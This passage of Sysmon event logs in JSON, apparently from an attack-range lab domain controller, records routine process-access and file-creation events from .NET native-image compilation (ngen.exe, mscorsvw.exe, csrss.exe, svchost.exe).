C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.417","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010337A0D00}","TargetProcessId":"3272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.417\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010337A0D00}\r\nTargetProcessId: 3272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.417","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010337A0D00}","TargetProcessId":"3272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:33.433\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010337A0D00}\r\nTargetProcessId: 3272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:33.433","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010337A0D00}","TargetProcessId":"3272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:34.402\r\nProcessGuid: {A837DB8D-0489-5F25-0000-0010337A0D00}\r\nProcessId: 3272\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cc8-0\\Microsoft.Internal.Tasks.Dataflow.dll\r\nCreationUtcTime: 2020-08-01 05:58:34.402","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:34.402","ProcessGuid":"{A837DB8D-0489-5F25-0000-0010337A0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cc8-0\\Microsoft.Internal.Tasks.Dataflow.dll","CreationUtcTime":"2020-08-01 05:58:34.402","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.464\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00102A7E0D00}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.464","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00102A7E0D00}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.464\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00102A7E0D00}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.464","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00102A7E0D00}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.464\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00102A7E0D00}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.464","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00102A7E0D00}","TargetProcessId":"2528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010AA810D00}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010AA810D00}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010AA810D00}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010AA810D00}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
